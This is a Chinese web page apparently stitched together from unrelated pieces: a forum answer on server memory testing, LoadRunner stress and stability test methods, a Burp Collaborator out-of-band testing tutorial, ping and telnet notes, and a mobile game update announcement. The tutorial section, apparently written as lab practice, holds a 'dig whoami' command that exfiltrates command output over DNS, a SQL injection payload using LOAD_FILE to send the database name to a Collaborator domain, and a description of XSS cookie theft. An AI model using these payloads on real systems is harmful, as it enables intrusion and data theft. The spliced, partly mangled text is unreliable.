如何检测服务器上面的内存的性能，稳定性呢？ 前提是不实用外部软件进行检测可以吗？

不用外部软件你让人怎么说，那只好是

1 如果自带检测的可以做些简单测试，以前用过台HP的服务器自带管理工具里有简单的内存测试

2 服务器内存多带ECC，校验出错了会写在日志里，用自带管理工具看日志看下是否有很多的ECC校验错，错多了就是内存不稳。

服务器稳定性是最重要的，如果在稳定性方面不能够保证业务运行的需要，在高的性能也是无用的。

　　正规的服务器厂商都会对产品惊醒不同温度和湿度下的运行稳定性测试。重点要考虑的是冗余功能，如：数据冗余、网卡荣誉、电源冗余、风扇冗余等。

　　一些测试方法主要分以下几种：

　　压力测试：已知系统高峰期使用人数，验证各事务在最大并发数(通过高峰期人数换算)下事务响应时间能够达到客户要求。系统各性能指标在这种压力下是否还在正常数值之内。系统是否会因这样的压力导致不良反应(如：宕机、应用异常中止等)。

　　Ramp Up 增量设计：如并发用户为75人，系统注册用户为1500人，以5%-7%作为并发用户参考值。一般以每15s加载5人的方式进行增压设计，该数值主要参考测试加压机性能，建议Run几次。以事务通过率与错误率衡量实际加载方式。

　　Ramp Up增量设计目标： 寻找已增量方式加压系统性能瓶颈位置，抓住出现的性能拐点时机，一般常用参考Hits点击率与吞吐量、CPU、内存使用情况综合判断。模拟高峰期使用人数，如早晨的登录，下班后的退出，工资发送时的消息系统等。

　　另一种极限模拟方式，可视为在峰值压力情况下同时点击事务操作的系统极限操作指标。加压方式不变，在各脚本事务点中设置同集合点名称(如：lr_rendzvous("same");)在场景设计中，使用事务点集合策略。以同时达到集合点百分率为标准，同时释放所有正在Run的Vuser。

　　稳定性测试：已知系统高峰期使用人数、各事务操作频率等。设计综合测试场景，测试时将每个场景按照一定人数比率一起运行，模拟用户使用数年的情况。并监控在测试中，系统各性能指标在这种压力下是否能保持正常数值。事务响应时间是否会出现波动或随测试时间增涨而增加。系统是否会在测试期间内发生如宕机、应用中止等异常情况。

　　根据上述测试中，各事务条件下出现性能拐点的位置，已确定稳定性测试并发用户人数。仍然根据实际测试服务器(加压机、应用服务器、数据服务器三方性能)，估算最终并发用户人数。

　　场景设计思想：

　　从稳定性测试场景的设计意义，应分多种情况考虑：

　　针对同一个场景为例，以下以公文附件上传为例简要分析场景设计思想：

　　1)场景一：已压力测试环境下性能拐点的并发用户为设计测试场景，目的验证极限压力情况下测试服务器各性能指标。

　　2)场景二：根据压力测试环境中CPU、内存等指标选取服务器所能承受最大压力的50%来确定并发用户数。

　　测试方法：采用1)Ramp Up-Load all Vusers simultaneously

　　2)Duration-Run Indefinitely

　　3)在Sechedule-勾选Initalize all Vusers before Run

　　容错性测试：通过模拟一些非正常情况(如：服务器突然断电、网络时断时续、服务器硬盘空间不足等)，验证系统在发生这些情况时是否能够有自动处理机制以保障系统的正常运行或恢复运行措施。如有HA(自动容灾系统)，还可以专门针对这些自动保护系统进行另外的测试。验证其能否有效触发保护措施。

　　问题排除性测试：通过原有案例或经验判断，针对系统中曾经发生问题或怀疑存在隐患的模块进行验证测试。验证这些模块是否还会发生同样的性能问题。如：上传附件模块的内存泄露问题、地址本模块优化、开启Tivoli性能监控对OA系统性能的影响等等。

　　测评测试是用于获取系统的关键性能指标点，而进行的相关测试。主要是针对预先没有明确的预期测试结果，而是要通过测试获取在特定压力场景下的性能指标(如：事务响应时间、最大并发用户数等)。

　　评测事务交易时间：为获取某事务在特定压力下的响应时间而进行的测试活动。通过模拟已知客户高峰期的各压力值或预期所能承受的压力值，获取事务在这种压力下的响应时间。

　　评测事务最大并发用户数：为获取某事务在特定系统环境下所能承受的最大并发用户数而进行的测试活动。通过模拟真实环境或直接采用真实环境，评测在这种环境下事务所能承受的最大并发用户数。判定标准阈值需预先定义(如响应时间，CPU占用率，内存占用率，已出现点击率峰值，已出现吞吐量峰值等)。

　　评测系统最大并发用户数：为获取整个系统所能够承受的最大并发用户数而进行的的测试活动。通过预先分析项目各主要模块的使用比率和频率，定义各事务在综合场景中所占的比率，以比率方式分配各事务并发用户数。模拟真实环境或直接采用真实环境，评测在这种环境下系统所能承受的最大并发用户数。判定标准阀值预先定义(如响应时间，CPU占用率，内存占用率，已出现点击率峰值，已出现吞吐量峰值等)。取值标准以木桶法则为准(并发数最小的事务为整个系统的并发数)。

　　评测不同数据库数据量对性能的影响：针对不同数据库数据量的测试，将测试结果进行对比，分析发现数据库中各表的数据量对事务性能的影响。得以预先判断系统长时间运行后，或某些模块客户要求数据量较大时可能存在的隐患。

　　问题定位测试在通过以上测试或用户实际操作已经发现系统中的性能问题或怀疑已存在性能问题。需通过响应的测试场景重现问题或定义问题。如有可能，可以直接找出引起性能问题所在的代码或模块。

　　该类测试主要还是通过测试出问题的脚本场景，并可以增加发现和检测的工具，如开启Tivoli性能监控、开启HeapDump输出、Linux资源监控命令等。并在场景运行过程中辅以手工测试。

Burp Collaborator 是 OAST的产物，它可以帮你实现对响应不可见和异步的一个漏洞检测。

目前 Burp 发布的新版本中默认携带了 Burp Collaborator 模块

Burp Collaborator 模型 参考上文带外攻击模型

Burp Collaborator 有自己专用域名 burpcollaboratornet ，类似于ceye平台，有一个权威DNS服务器，用户使用Collaborator模块时会给每一个用户会分配一个二级域名。

Burp Collaborator 只是一个客户端，我们可以使用 Burp 给我们配置的默认带外服务器，也可以使用自己私有的服务器。

Burp Collaborator 配置

可以选择使用默认的配置 外带服务器，也可以自己设置外带服务器

点击 Run health check 可以测试外带服务器服务是否正常

打开 Collaborator 客户端

使用 Client

使用 dig 查询 域名

<pre class="md-fences md-end-block ty-contain-cm modeLoaded" spellcheck="false" cid="n53" mdtype="fences" style="box-sizing: border-box; overflow: visible; font-family: var(--monospace); font-size: 09em; display: block; break-inside: avoid; text-align: left; white-space: normal; background-image: inherit; background-position: inherit; background-size: inherit; background-repeat: inherit; background-attachment: inherit; background-origin: inherit; background-clip: inherit; background-color: rgb(248, 248, 248); position: relative !important; border: 1px solid rgb(231, 234, 237); border-radius: 3px; padding: 8px 4px 6px; margin-bottom: 15px; margin-top: 15px; width: inherit; color: rgb(51, 51, 51); font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;" lang="">dig whoami 7jr9gk6gtnstix33jp6181eu2l8cw1burpcollaboratornet</pre>

查看 Client 返回的日志

可见，我们通过dig 查看DNS记录的方式，将whoami的命令携带发送到服务器。

使用Burp 提供的靶场，来介绍 Burp Collaborator的用法

工作原理

Burp Collaborator 生成唯一的域名，将它们以有效负载的形式发送到应用程序，并监视与这些域的任何交互。如果观察到来自应用程序的传入请求，那么就可以检测到对应的漏洞。

检测过程

将Burp Collaborator Client 的获取的域名 添加HTTP请求的 Referer位置 等待几秒 然后点击poll now 会看到应用程序启动的DNS 和HTTP交互

我这里使用 sqli 的靶场演示一下利用 burp Collaborator 实现DNSLog注入

前提条件： secure_file_priv 为空，（如果非空，只能读取对应目录下的文件）

select 1,2,LOAD_FILE(concat('\\\\',database(),'~','xwxb0b0bnpm5bnjbo19apeivpmvfj4burpcollaboratornet\\a')) --+

在 xss payload 中，添加自己burp collaborator 生成的域名

等待 管理员查看评论即可触发 xss payload 实现对cookie 的获取

还有更多用法，期待大家去发现，

1、如果只测试网络是否通，最简单直接有效的办法使用ping比如：ping 1921681100 #测试1921681100是否可用

ping更多参数：

-d：使用Socket的SO_DEBUG功能;

-c<完成次数>：设置完成要求回应的次数;

-f：极限高速方式检测;

-i<间隔秒数>：指定收发信息的间隔时间，wait的秒数;

-I<网络界面>：使用指定的网络界面送出数据包;

-l<前置载入>：设置在送出要求信息之前，先行发出的数据包;

-n：只输出数值;

-p<范本样式>：设置填满packetsize 数据包的范本样式;

-q：不显示指令执行过程，开头和结尾的相关信息除外;

-r：忽略普通的Routing Table，直接将数据包送到远端主机上;

-R：记录路由过程;

-s<数据包大小>：设置packetsize 数据包的大小;

-t<存活数值>：设置存活数值TTL的大小;

-v：详细显示指令的执行过程。

2、如果希望测试服务器上的某个端口是否可用，就是用telnet

telnet 1921681100 80 #测试1921681100机器上80端口

梦幻西游三维版服务器等级提升。梦幻西游三维版今日迎来版本更新，此次更新之后将服务器等级提升到了95级，此外也推出了新的装备。下面就为大家带来10月14日更新内容一览。

10月14日更新内容一览

梦幻西游三维版等级解锁于今天中午12:00在安卓大区（[梦回长安]、[为爱一博]、[盛唐风华]、[梦回唐朝]）进行外测，届时服务器等级将由89级提升至95级。

身处这四大服务器且经验已满的少侠，将自动领取等级突破任务，并在孙悟空的指点下提升等级上限。10月16日中午12点，全新等级将于全部服务器放出。九冥动作不断，三界尚未安宁，少侠将与反派组织“九冥”围绕地脉展开斗争，一段调查地脉异变的故事计将开启。山河社稷图已在修复当中，一直藏身幕后的白蛇精终于按捺不住，决意亲自出手。黑风村中有何种隐情？我们又会与黑熊精产生怎样的交集？全新主线任务义绝黑风待你一探究竟！

全新装备现身三界，少侠前来一睹为快！

全新等级开启后，新增90级装备也将同步现身三界！[秋水长天]（剑）、[太清如意]（环圈）、[修罗夜煞]（枪）、[沧海月明]（法杖）、[残月乱影]（刀）、[烈日撕天]（爪刃）、[太极乾坤]（扇）、[九霄云音]（琵琶）等装备上线，待各位少侠前来体验。

全新召唤兽全服外放，让它们陪你作战到底！

全新召唤兽来袭，少侠可以换上全新宠物了。携带等级90级的辅助型召唤兽“龙龟”、携带等级95级的召唤兽“画魂”以及携带等级95级的稀有召唤兽“大力金刚”在全服外放。少侠快来三界体验全新召唤兽与装备吧！